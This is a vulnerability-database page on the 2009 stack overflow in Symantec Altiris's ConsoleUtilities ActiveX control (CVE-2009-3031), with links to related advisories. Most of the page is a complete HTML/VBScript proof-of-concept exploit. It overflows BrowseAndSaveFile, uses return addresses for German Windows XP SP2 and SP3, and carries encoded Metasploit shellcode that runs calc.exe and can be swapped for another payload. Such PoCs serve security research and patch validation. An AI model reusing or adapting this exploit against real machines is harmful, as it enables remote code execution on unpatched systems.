Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Symantec Altiris产品ConsoleUtilities ActiveX控件栈溢出漏洞

🗓️ 03 Nov 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 41 Views

Symantec Altiris Stack Overflow Vulnerability in ConsoleUtilities Active

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Symantec ConsoleUtilities ActiveX Buffer Overflow
2 Nov 200900:00
zdt
Tenable Nessus		Altiris ConsoleUtilities 'BrowseAndSaveFile()' ActiveX Control Buffer Overflow
4 Nov 200900:00
nessus
Circl		CVE-2009-3031
2 Nov 200900:00
circl
Check Point Advisories		Symantec Multiple Products AeXNSConsoleUtilities Buffer Overflow (CVE-2009-3031; CVE-2009-3033)
16 Dec 200900:00
checkpoint_advisories
CVE		CVE-2009-3031
3 Nov 200916:00
cve
Cvelist		CVE-2009-3031
3 Nov 200916:00
cvelist
Exploit DB		Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
11 Nov 201000:00
exploitdb
Exploit DB		Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)
2 Nov 200900:00
exploitdb
exploitpack		Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)
2 Nov 200900:00
exploitpack
Metasploit		Symantec ConsoleUtilities ActiveX Control Buffer Overflow
2 Nov 200921:02
metasploit
Rows per page

                                                <html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/>
</object>
<script language='vbscript'>

Sub Submit_OnClick

   For i=0 to 2
      If document.ret.os(i).checked Then
         target=document.ret.os(i).value
      End If
   Next

   EIP=unescape(target)
   arg1 = ""
   arg3 = ""
   arg4 = ""
   arg5 = ""

   junk=String(310, "A") 'junk

   morejunk=String(18, unescape("%u0041")) 'more junk

   // windows/exec - 224 bytes
   // http://www.metasploit.com
   // Encoder: x86/call4_dword_xor
   // EXITFUNC=seh, CMD=calc.exe
   code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_
                 "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_
                 "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_
                 "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_
                 "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_
                 "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_
                 "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_
                 "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_
                 "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_
                 "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_
                 "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_
                 "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_
                 "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_
                 "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")

   buf=junk+EIP+morejunk+break+code

   obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>

<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>

<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>

XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
    
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
----------------------------------------------------------------
<form name="ret">
<input type=radio name="os" value="%u4141%u4141">
    DoS<br>
<input type=radio name="os" value="%uaf0a%u77d5">
    Windows XP SP2 German<br>
<input type=radio name="os" value="%u30D7%u7E68">
    Windows XP SP3 German<br>
<input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Nov 2009 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.76639
symantec altiris deployment solutionactivexstack overflowvulnerabilityaexnsconsoleutilities.dllweb consolemalicious webpagesecurity patchnotification servermanagement platform.
41